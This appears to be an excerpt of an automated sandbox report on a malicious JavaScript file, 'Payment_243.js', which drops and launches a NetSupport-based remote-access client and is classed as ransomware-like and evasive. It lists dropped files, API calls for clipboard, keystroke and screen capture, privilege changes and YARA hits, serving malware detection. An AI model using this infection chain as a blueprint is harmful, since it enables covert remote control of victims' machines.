Source: Payment_243.js	String found in binary or memory: https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,

4_2_1101FC20

Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_110335A0 GetClipboardFormatNameA,SetClipboardData,		4_2_110335A0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,		4_2_1101FC20

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,

4_2_11033320

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,

4_2_110077A0

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,

4_2_11114590

Source: Yara match	File source: 8.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: client32.exe PID: 3748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 3908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 3992, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\x225qa0\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,

4_2_111165C0

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\ProgID			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID			Jump to behavior

Source: C:\ProgramData\x225qa0\client32.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_11113190: GetKeyState,DeviceIoControl,keybd_event,

4_2_11113190

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,

4_2_1115EA00

Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		4_2_1102D9F4
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		4_2_1102DD21

Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11073680	4_2_11073680
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11029BB0	4_2_11029BB0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_110627B0	4_2_110627B0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1111C990	4_2_1111C990
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_110336D0	4_2_110336D0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11051800	4_2_11051800
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1115F840	4_2_1115F840
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1102BD40	4_2_1102BD40
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1101BCD0	4_2_1101BCD0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11087F50	4_2_11087F50
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11045E70	4_2_11045E70
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1101C110	4_2_1101C110
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_111640E0	4_2_111640E0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11168345	4_2_11168345
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_111265B0	4_2_111265B0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11070430	4_2_11070430
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_11080740	4_2_11080740
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1100892B	4_2_1100892B
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1101CF30	4_2_1101CF30
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A12EB1A	6_2_6A12EB1A
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A170915	6_2_6A170915
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A110919	6_2_6A110919
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A156E18	6_2_6A156E18
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F6E28	6_2_6A0F6E28
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F6E24	6_2_6A0F6E24
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A178220	6_2_6A178220
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13A277	6_2_6A13A277
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F828B	6_2_6A0F828B
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A1522CD	6_2_6A1522CD
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F839B	6_2_6A0F839B
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A154159	6_2_6A154159
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0FA1DD	6_2_6A0FA1DD
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0E21F0	6_2_6A0E21F0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A15E7F1	6_2_6A15E7F1
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A1867FF	6_2_6A1867FF
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F8468	6_2_6A0F8468
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A1045AE	6_2_6A1045AE
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13DA38	6_2_6A13DA38
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A181AE0	6_2_6A181AE0
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F3B1D	6_2_6A0F3B1D
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A187B2A	6_2_6A187B2A
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A159877	6_2_6A159877
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A15F8BA	6_2_6A15F8BA
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A173968	6_2_6A173968
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F5E20	6_2_6A0F5E20
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13DF35	6_2_6A13DF35
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F9C8E	6_2_6A0F9C8E
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A171CEF	6_2_6A171CEF
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F7D20	6_2_6A0F7D20
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F3DB1	6_2_6A0F3DB1
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F7210	6_2_6A0F7210
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A189295	6_2_6A189295
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A10911E	6_2_6A10911E
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A15516D	6_2_6A15516D
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A1531BA	6_2_6A1531BA
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A1896A7	6_2_6A1896A7
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F96C9	6_2_6A0F96C9
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A15B723	6_2_6A15B723
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A17D754	6_2_6A17D754
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F5795	6_2_6A0F5795
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A15D43B	6_2_6A15D43B
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13D4FF	6_2_6A13D4FF
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F75C1	6_2_6A0F75C1
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A0F35FA	6_2_6A0F35FA
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_716629A0	6_2_716629A0

Source: Joe Sandbox View

Dropped File: C:\ProgramData\x225qa0\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899

Source: C:\ProgramData\x225qa0\client32.exe

Process token adjusted: Security

Jump to behavior

Source: C:\ProgramData\x225qa0\client32.exe	Code function: String function: 6A0F0934 appears 76 times
Source: C:\ProgramData\x225qa0\client32.exe	Code function: String function: 11161299 appears 40 times
Source: C:\ProgramData\x225qa0\client32.exe	Code function: String function: 11027F40 appears 47 times
Source: C:\ProgramData\x225qa0\client32.exe	Code function: String function: 6A0FB69A appears 61 times
Source: C:\ProgramData\x225qa0\client32.exe	Code function: String function: 6A0FA455 appears 40 times
Source: C:\ProgramData\x225qa0\client32.exe	Code function: String function: 11164ED0 appears 33 times
Source: C:\ProgramData\x225qa0\client32.exe	Code function: String function: 11147060 appears 571 times
Source: C:\ProgramData\x225qa0\client32.exe	Code function: String function: 1105E820 appears 310 times
Source: C:\ProgramData\x225qa0\client32.exe	Code function: String function: 11081E70 appears 46 times
Source: C:\ProgramData\x225qa0\client32.exe	Code function: String function: 6A0F0950 appears 151 times
Source: C:\ProgramData\x225qa0\client32.exe	Code function: String function: 11029A70 appears 958 times
Source: C:\ProgramData\x225qa0\client32.exe	Code function: String function: 1116FED0 appears 37 times

Source: Payment_243.js

Initial sample: Strings found which are bigger than 50

Source: api-ms-win-core-localization-l1-2-0.dll.0.dr

Static PE information: No import functions for PE file found

Source: classification engine

Classification label: mal100.rans.evad.winJS@5/26@1/3

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_1105A760 GetLastError,FormatMessageA,LocalFree,

4_2_1105A760

Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,		4_2_1109D860
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,		4_2_1109D8F0

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 6_2_6A13D3BB _getdiskfree,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_memset,GetDiskFreeSpaceA,GetLastError,_errno,

6_2_6A13D3BB

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,

4_2_11116880

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_11089430 FindResourceA,LoadResource,LockResource,

4_2_11089430

Source: C:\ProgramData\x225qa0\client32.exe

Code function: 4_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,

4_2_11128B10

Source: C:\ProgramData\x225qa0\client32.exe

File created: C:\Users\user\AppData\Local\NetSupport

Jump to behavior

Source: C:\ProgramData\x225qa0\client32.exe

Mutant created: NULL

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\ProgramData\x225qa0\client32.exe "C:\ProgramData\x225qa0\client32.exe"
Source: unknown	Process created: C:\ProgramData\x225qa0\client32.exe "C:\ProgramData\x225qa0\client32.exe"
Source: unknown	Process created: C:\ProgramData\x225qa0\client32.exe "C:\ProgramData\x225qa0\client32.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\ProgramData\x225qa0\client32.exe "C:\ProgramData\x225qa0\client32.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscdll.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: synceng.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: devrtl.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: pcihooks.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: pciinv.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\ProgramData\x225qa0\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File written: C:\ProgramData\x225qa0\NSM.ini

Jump to behavior

Source: C:\ProgramData\x225qa0\client32.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Jump to behavior

Source: Payment_243.js

Static file information: File size 5736023 > 1048576

Source: C:\Windows\System32\wscript.exe

File opened: C:\PROGRA~3\x225qa0\msvcr100.dll

Jump to behavior

Source:	Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000006.00000002.530287670.000000006A0E1000.00000020.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.547818882.000000006A0E1000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: client32.exe, 00000004.00000002.671173714.0000000073622000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000006.00000002.530359890.0000000073622000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000008.00000002.547917343.0000000073622000.00000002.00000001.01000000.0000000A.sdmp
